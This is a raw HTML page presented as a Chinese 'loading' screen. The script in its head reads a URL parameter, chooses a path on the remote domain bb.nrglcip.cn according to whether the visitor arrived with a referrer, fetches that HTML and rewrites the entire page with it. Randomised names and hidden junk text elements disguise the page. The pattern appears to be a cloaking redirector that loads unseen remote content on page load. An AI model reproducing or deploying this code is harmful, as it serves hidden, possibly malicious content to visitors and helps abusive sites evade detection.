<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LgXyY83D0M {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LgXyY83D0M .A2KjxM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LgXyY83D0M .content {
            line-height: 50px;
            text-align: center
        }

        .LgXyY83D0M .img {
            width: 100%
        }

        .LgXyY83D0M .u6dwce {
            text-align: center
        }

        .LgXyY83D0M .u6dwce span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LgXyY83D0M .u6dwce span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LgXyY83D0M .u6dwce span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LgXyY83D0M .u6dwce span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LgXyY83D0M .u6dwce span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LgXyY83D0M .u6dwce span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LgXyY83D0M .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function v3C0dcLDGp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var x6E0OK = v3C0dcLDGp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ x6E0OK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ x6E0OK +".html?a=share";
		}
		
        LZt1cNv=url+"#"+new Date().getTime();
        LZt1cNv && function() {
            $.get(LZt1cNv, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>ADWFTF6S59kInPdRapGjCWsjmKKbXZgmxhHNj61DBn3OQKDFcgoYBCYUgtl</div>
<h1 style='display:none' >eEFGmgc8uARQ6Oa0TwmWaOqi6reVDxQYrEozjUI7zo7RbwwgPJNHsgHKmIEK4qQT1EKgKS</h1>
<div style='display:none'>ADWFTF6S59kInPdRapGjCWsjmKKbXZgmxhHNj61DBn3OQKDFcgoYBCYUgtl</div>
<ul style='display:none' >zF3inu1UZU6GgkUXFlL3rcDbSIvXqVT4VFGU3ljrJppad0kWPMvMEVmPFiEN7r70oS17faU</ul>
<p  style='display:none'>bkXs3oxCYB6rsGAvMqW1ufZZpc0cNzDyXknqErW5ZJg8MRMPyfh00a3k6woy3Ev3B9T1aL8CTmdLl4InUi7EcfPBXGVXLv</p>
<ul style='display:none' >zF3inu1UZU6GgkUXFlL3rcDbSIvXqVT4VFGU3ljrJppad0kWPMvMEVmPFiEN7r70oS17faU</ul>
<img  src='' style='display:none'>
<p  style='display:none'>bkXs3oxCYB6rsGAvMqW1ufZZpc0cNzDyXknqErW5ZJg8MRMPyfh00a3k6woy3Ev3B9T1aL8CTmdLl4InUi7EcfPBXGVXLv</p><div class="LgXyY83D0M">
    <div class="A2KjxM">
        <div class="u6dwce">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >jHZo1Q1IGuLQbiNkDPbg2psbQTBQaI8lSwRjlT4r2xgQrsXb1drePZyZl4ESgm7kq9</ul>
<a  href='#' style='display:none'>ESzR9syvBN9N1GLZymnsoH65vrl7qwsX472zlRYYeWTrBKYij8xqPuU8FEdtznDvwGJuPTXPjIF4BrM08qd4PV5ihLP4hldn65</a>
<span style='display:none'>euaieSfbLcd9bqr6FU8CCFfOa65b4UAg49VNhucPGZzSqK8Ts0kAEdU54ezdZnt</span>
<span style='display:none'>euaieSfbLcd9bqr6FU8CCFfOa65b4UAg49VNhucPGZzSqK8Ts0kAEdU54ezdZnt</span></body>
</html>